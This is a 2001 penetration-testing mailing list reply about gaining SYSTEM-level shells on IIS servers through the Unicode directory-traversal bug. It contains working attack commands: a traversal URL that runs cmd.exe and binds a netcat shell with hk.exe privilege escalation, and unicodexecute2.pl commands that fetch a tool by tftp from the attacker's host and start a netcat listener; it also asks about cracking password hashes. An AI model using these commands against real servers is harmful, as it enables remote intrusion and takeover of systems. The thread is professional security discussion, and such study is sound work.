Penetration Testing mailing list archives
Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug?
From: Nelson Brito <nelson () SECUNET COM BR>
Date: Tue, 27 Mar 2001 15:23:40 -0300
Renato Ettisberger wrote:
Hi there,
Hello! ;))
As you know, there is a way to span a shell with admin rights on a IIS4.0with the Unicode bug.What way? Did you use CmdAsp.ASP to do that? Is it possible?No, I use the tool hk.exe from RAZOR. With this tool, you can launch a cmd.exe with system privileges. Upload hk.exe and netcat to the server. The following URL binds a netcat server with system privileges on port 53 (this workes fine on our test server IIS4.0, NT engl. Version) http://www.target.com/msadc/..%c0%af../%c0%af../%c0%af../winnt/system32/cmd.exe?/c+c: winnt\system32\hk.exe+cmd+/c+nc.exe+"-n"+"-l"+"-v"+"-p"+53+"-e"+cmd.exe
You could use the same technique with netddemsg.exe to do that! But, when I send my first mail I made a *BIG* mistake, coz the netddemsg.exe usage is: netddemsg.exe [-s <sharename>] <command line> So you could do: C:\uniexp>unicodexecute2.pl www.victim.com:80 "C:\\WINNT\\system32\\tftp.exe -i your.own.host.com GET netddemsg.exe" C:\uniexp>unicodexecute2.pl www.victim.com:80 "C:\\WINNT\\system32\\net.exe share" Ok, now you have the share's names: C:\uniexp>unicodexecute2.pl www.victim.com:80 "netddemsg.exe -s SHARENAME \"nc.exe -n -l -d -p 53\"" PS: To know more about netddemsg.cpp take a look at: http://www.atstake.com/research/advisories/2001/a020501-1.txt PPS: Sorry, @Stake's folks, I didn't put the credits on my first mail. I'm really sorry. [...]
BTW: My question is, how can I crack the password hash, when it comes in the following form: F:0x020020000000000000000000.... V:0x00000000a800000......
I don't know, what kid of tool are you using? [...]
P.S: My English is not bad, it's horrible, but I hope you understand what I'm talking about ;-)
Sem mais,
--
# Nelson Brito - IBQN / Security Networks AG - The trust Company!
# "Windows NT can also be protected from nmap OS detection scans
# thanks to *Nelson Brito* ..."
# Passage from "Hack Proofing your Network", page 93
open(S,shift) || die "Use: $0 <file>\n";
foreach(<S>){ chop; split(//,$_); print reverse @_; print "\n"; }
close(S);
Current thread:
- [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Renato Ettisberger (Mar 25)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Nelson Brito (Mar 26)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Nelson Brito (Mar 26)
- <Possible follow-ups>
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Wertheimer, Ishai (Mar 25)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? H D Moore (Mar 25)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Renato Ettisberger (Mar 27)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Nelson Brito (Mar 27)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Renato Ettisberger (Mar 28)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? robmann (Mar 28)
- Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug? Nelson Brito (Mar 26)